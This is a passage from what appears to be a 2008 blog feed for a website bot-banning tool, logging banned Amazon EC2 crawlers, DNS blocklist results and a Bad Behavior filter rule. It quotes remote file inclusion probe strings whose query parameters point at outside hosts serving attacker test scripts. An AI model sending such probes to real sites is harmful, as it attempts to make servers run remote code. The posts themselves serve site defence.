/>then after geting banned keeps trying with this set of scripts.<br /><br />?feed=http%3A%2F%2Fwww.qubestunes.com%2Ftreytest%2F1%2Fadoyuru%2Fzagu%2F <br />p=http%3A%2F%2Fwww.heaven-house.kz%2Ftemplates_c%2Fomoj%2Femuqir%2F<br /><br />they all are scripts used by hackers to display a test message on your server<br />http://chyngachanga.ru/content/wuge/owofi/<br />http://www.qubestunes.com/treytest/1/adoyuru/zagu/ <br />http://www.heaven-house.kz/templates_c/omoj/emuqir/<div class="blogger-post-footer">Get M&M Autoban to protect your website.</div>tmasternoreply@blogger.com0tag:blogger.com,1999:blog-33923218.post-82086173834507462772008-06-30T23:41:00.002-05:002008-07-15T01:32:33.254-05:00After banning the domain amazonaws.com because they are hosting bots.<br />I get all of this. <br /><br />Agent: webclient <br />75.101.206.181 ec2-75-101-206-181.compute-1.amazonaws.com <br />Agent: webclient <br />75.101.206.181 ec2-75-101-206-181.compute-1.amazonaws.com <br />Agent: mozilla/4.0 (compatible; msie 7.0; windows nt 5.1; .net clr 1.1.4322) <br />67.202.31.132 ec2-67-202-31-132.compute-1.amazonaws.com <br />Agent: mozilla/4.0 (compatible; msie 7.0; windows nt 5.1; .net clr 1.1.4322; .net clr 2.0.50727) <br />67.202.31.132 ec2-67-202-31-132.compute-1.amazonaws.com <br />Agent: mozilla/4.0 (compatible; msie 7.0; windows nt 5.1; .net clr 1.1.4322) <br />67.202.57.15 ec2-67-202-57-15.compute-1.amazonaws.com <br />Agent: mozilla/4.0 (compatible; msie 7.0; windows nt 5.1; .net clr 1.1.4322; .net clr 2.0.50727) <br />67.202.57.15 ec2-67-202-57-15.compute-1.amazonaws.com<br /> <br />Agent: mozilla/4.0 (compatible; msie 7.0; windows nt 5.1; .net clr 1.1.4322; .net clr 2.0.50727) <br />67.202.57.15 ec2-67-202-57-15.compute-1.amazonaws.com <br /> <br />Agent: Mozilla/5.0 (compatible; zermelo; +http://www.powerset.com) [email:paul@page-store.com-crawl@powerset.com] <br />72.44.49.121 ec2-72-44-49-121.z-1.compute-1.amazonaws.com<br /> <br />Agent: AideRSS/1.0 (aiderss.com); * subscribers <br />67.202.34.44 ec2-67-202-34-44.compute-1.amazonaws.com<br /><br /><br />-----Update AideRSS just does not get it that they have been blocked.<br />67.202.23.122 ec2-67-202-23-122.compute-1.amazonaws.com <br />[06-17-2008-16:07:52] Scan Blacklist Domain Ban: amazonaws.com <br />Agent: AideRSS/1.0 (aiderss.com); * subscribers <br />75.101.226.160 ec2-75-101-226-160.compute-1.amazonaws.com <br />[06-17-2008-16:09:04] Scan Blacklist Domain Ban: amazonaws.com <br />Agent: AideRSS/1.0 (aiderss.com); * subscribers <br />75.101.219.174 ec2-75-101-219-174.compute-1.amazonaws.com <br />[06-17-2008-16:09:19] Scan Blacklist Domain Ban: amazonaws.com <br />Agent: AideRSS/1.0 (aiderss.com); * subscribers <br />67.202.21.42 ec2-67-202-21-42.compute-1.amazonaws.com <br />[06-17-2008-16:09:22] Scan Blacklist Domain Ban: amazonaws.com <br />Agent: AideRSS/1.0 (aiderss.com); * subscribers <br />67.202.23.83 ec2-67-202-23-83.compute-1.amazonaws.com <br />[06-17-2008-16:09:29] Scan Blacklist Domain Ban: amazonaws.com <br />Agent: AideRSS/1.0 (aiderss.com); * subscribers <br />75.101.211.7 ec2-75-101-211-7.compute-1.amazonaws.com <br />[06-17-2008-16:09:35] Scan Blacklist Domain Ban: amazonaws.com <br />Agent: AideRSS/1.0 (aiderss.com); * subscribers <br />75.101.244.65 ec2-75-101-244-65.compute-1.amazonaws.com<br />Agent: AideRSS/1.0 (aiderss.com); * subscribers <br />67.202.61.94 ec2-67-202-61-94.compute-1.amazonaws.com <br /><br /><br />Update <br /><br />67.202.31.132 is BLACKLISTED by dnsbl.njabl.org for spam<br />67.202.61.94 is BLACKLISTED by dnsbl.njabl.org for spam<br />67.202.23.83 is BLACKLISTED by dnsbl.njabl.org for spam<br />67.202.21.42 is BLACKLISTED by dnsbl.njabl.org for spam<br />67.202.23.122 is BLACKLISTED by dnsbl.njabl.org for spam<br />67.202.34.44 is BLACKLISTED by dnsbl.njabl.org for spam<br />67.202.57.15 is BLACKLISTED by dnsbl.njabl.org for spam<br /><br /><br />The following comment is associated with this record: This network is a member of a dynamic hosting environment. See http://ec2.amazonaws.com/<br />It was added to the list: Tue Apr 1 12:41:39 2008 EST<br /><br />spam source means the system was found via manual spam header parsing to be the origin of spam.<br /><br />update july 15th <br />Agent: firefox/2.0.0.6 (ubuntu-feisty) <br />72.44.48.95 ec2-72-44-48-95.compute-1.amazonaws.com<div class="blogger-post-footer">Get M&M Autoban to protect your website.</div>tmasternoreply@blogger.com9tag:blogger.com,1999:blog-33923218.post-45226038013555871832008-06-17T12:57:00.002-05:002008-06-17T13:08:59.180-05:00openrbl.org is goneopenrbl.org is down and I need a replacement that can do a lookup on all of the block list and do a DNS lookup. <br /><br />I did find a replacement of sorts. Change the admin.php $dns_lookup setting to.<br /><br />$dns_lookup ="http://www.robtex.com/rbl/";<br /><br /><br />If anyone knows of one please post it.<div class="blogger-post-footer">Get M&M Autoban to protect your website.</div>tmasternoreply@blogger.com1tag:blogger.com,1999:blog-33923218.post-14325360906582303592008-06-06T12:44:00.000-05:002008-06-06T12:44:28.865-05:00Request contained a malicious JavaScript or SQL injection attackbad-behavior is now blocking what it says is a SQL injection but all its really looking for is a # in the header. So I end up seeing crap like this.<br /><br />I think this may be a bug in bad behavior<br /><br />Update: I am still seeing this from the Yahoo bot<br /><br />403 Request contained a malicious JavaScript or SQL injection attack <br />Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) <br />74.6.8.122 llf520018.crawl.yahoo.net <br /><br />403 Request contained a malicious JavaScript or SQL injection attack <br />Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) <br />74.6.17.186 llf520164.crawl.yahoo.net <br /><br />403 Request contained a malicious JavaScript or SQL injection attack www.winnfreenet.com <br />Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) <br />74.6.22.159 llf520079.crawl.yahoo.net <br /><br /><br /><br /> // Broken spambots send URLs with various invalid characters<br /> // Some broken browsers send the #vector in the referer field :(<br /> if (strpos($package['request_uri'], "#") !== FALSE) {<br /> return "dfd9b1ad";<br /> }<div class="blogger-post-footer">Get M&M Autoban to protect your website.</div>tmasternoreply@blogger.com0